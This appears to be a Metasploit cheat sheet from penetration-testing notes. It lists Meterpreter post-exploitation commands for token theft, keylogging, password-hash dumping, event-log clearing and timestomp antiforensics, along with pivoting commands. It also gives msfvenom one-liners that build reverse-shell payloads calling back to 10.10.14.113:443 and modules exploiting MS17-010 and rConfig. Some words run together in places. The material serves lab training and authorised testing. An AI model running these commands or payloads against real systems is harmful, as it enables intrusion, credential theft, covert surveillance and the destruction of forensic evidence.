Metasploit Framework
Introduction
The Metasploit Framework is a Ruby-based penetration testing platform that writing, testing, and executing exploit code. Metasploit contains a suite of tools to test security vulnerabilities, enumerate networks, execute attacks, and evade detection.
MSFconsole Commands
show exploits
Show all exploits within the Framework.
show payloads
Show all payloads within the Framework.
setg
Set a specific value globally (for example, LHOST or RHOST).
show options
Show the options available for a module or exploit.
show targets
Show the platforms supported by the exploit.
set target
Specify a specific target index if you know the OS and service pack.
set payload
Specify the payload to use.
show advanced
Show advanced options.
sessions -l
List available sessions (used when handling multiple shells).
sessions -i
Interact with a session
sessions -K
Kill all live sessions.
sessions -c
Execute a command on all live Meterpreter sessions.
sessions -u
Upgrade a normal Win32 shell to a Meterpreter console.
Meterpreter Commands
migrate <proc. id>
Migrate to the specific process ID (PID is the target process ID gained from the ps command).
list_tokens -u
List available tokens on the target by user.
list_tokens -g
List available tokens on the target by group.
impersonate_token <DOMAIN_NAMEUSERNAME>
Impersonate a token available on the target.
steal_token <proc. id>
Steal the tokens available for a given process and impersonate that token.
drop_token
Stop impersonating the current token.
getsystem
Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.
shell
Drop into an interactive shell with all available tokens.
execute -f <cmd.exe> -i
Execute cmd.exe and interact with it.
execute -f <cmd.exe> -i -t
Execute cmd.exe with all available tokens.
execute -f <cmd.exe> -i -H -t
Execute cmd.exe with all available tokens and make it a hidden process.
rev2self
Revert back to the original user you used to compromise the target.
reg
Interact, create, delete, query, set, and much more in the targetβs registry.
setdesktop
Switch to a different screen based on who is logged in.
screenshot
Take a screenshot of the targetβs screen.
upload
Upload a file to the target.
download
Download a file from the target.
keyscan_start
Start sniffing keystrokes on the remote target.
keyscan_dump
Dump the remote keys captured on the target.
keyscan_stop
Stop sniffing keystrokes on the remote target.
getprivs
Get as many privileges as possible on the target.
uictl enable <keyboard/mouse>
Take control of the keyboard and/or mouse.
background
Run your current Meterpreter shell in the background.
hashdump
Dump all hashes on the target. use sniffer Load the sniffer module.
sniffer_interfaces
List the available interfaces on the target.
sniffer_dump pcapname
Start sniffing on the remote target.
sniffer_start packet-buffer
Start sniffing with a specific range for a packet buffer.
sniffer_stats
Grab statistical information from the interface you are sniffing.
sniffer_stop
Stop the sniffer.
add_user -h
Add a user on the remote target.
add_group_user <"Domain Admins"> -h
Add a username to the Domain Administrators group on the remote target.
clearev
Clear the event log on the target machine.
timestomp
Change file attributes, such as creation date (antiforensics measure).
reboot
Reboot the target machine.
Common Meterpreter Payloads for Windows
generic/custom
Generic listener, multi-use
generic/shell_bind_tcp
Generic listener, multi-use, normal shell, TCP connection binding
generic/shell_reverse_tcp
Generic listener, multi-use, normal shell, reverse TCP connection
windows/x64/exec
Executes an arbitrary command (Windows x64)
windows/x64/loadlibrary
Loads an arbitrary x64 library path
windows/x64/messagebox
Spawns a dialog via MessageBox using a customizable title, text & icon
windows/x64/shell_reverse_tcp
Normal shell, single payload, reverse TCP connection
windows/x64/shell/reverse_tcp
Normal shell, stager + stage, reverse TCP connection
windows/x64/shell/bind_ipv6_tcp
Normal shell, stager + stage, IPv6 Bind TCP stager
windows/x64/meterpreter/$
Meterpreter payload + varieties above
windows/x64/powershell/$
Interactive PowerShell sessions + varieties above
windows/x64/vncinject/$
VNC Server (Reflective Injection) + varieties above
Importing External Exploits into MSFConsole
The default directory where all the modules, scripts, plugins, and
msfconsole
proprietary files are stored is/usr/share/metasploit-framework
Alternatively, you can use the folder/home/username/.msf4
To import a module, you just need to copy it in one of the previous folders and use thereload_all
command. Alternatively, you can load a module at runtime by usingloadpath /usr/share/metasploit-framework/modules/
Meterpreter Pivoting
portfwd add -R -l 8443 -p 1234 -L 10.10.14.15
Set up a local port forwarding rule to forward all traffic destined to port 1234 on 10.10.14.15 to port 8443 on our attack host
run autoroute -s 172.16.9.0/23
set up a route to the 172.16.9.0/23 subnet
Msfconsole & Msfvenom
use exploit/windows/smb/psexec
Metasploit exploit module that can be used on vulnerable Windows system to establish a shell session utilizing smb & psexec
shell
Command used in a meterpreter shell session to drop into a system shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf
MSFvenom command used to generate a linux-based reverse shell stageless payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe
MSFvenom command used to generate a Windows-based reverse shell stageless payload
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho
MSFvenom command used to generate a MacOS-based reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp
MSFvenom command used to generate a ASP web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp
MSFvenom command used to generate a JSP web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war
MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload
use auxiliary/scanner/smb/smb_ms17_010
Metasploit exploit module used to check if a host is vulnerable to ms17_010
use exploit/windows/smb/ms17_010_psexec
Metasploit exploit module used to gain a reverse shell session on a Windows-based system that is vulnerable to ms17_010
use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
Metasploit exploit module that can be used to optain a reverse shell on a vulnerable linux system hosting rConfig 3.9.6
Utilities - Exploit Suggester & HashDump
local_exploit_suggester
: useful module for priveschashdump
orcomando lsa_dump_secrets
orlsa_dump_sam
: commands to dump all passwords \Disclaimer: before using
hashdump
you need to ensure to haveroot
ornt authority system
privilegesTo do that, use
ps
to check the permissions of the current process you are on, then usemigrate PID
on a root process, if you aren't root already
Last updated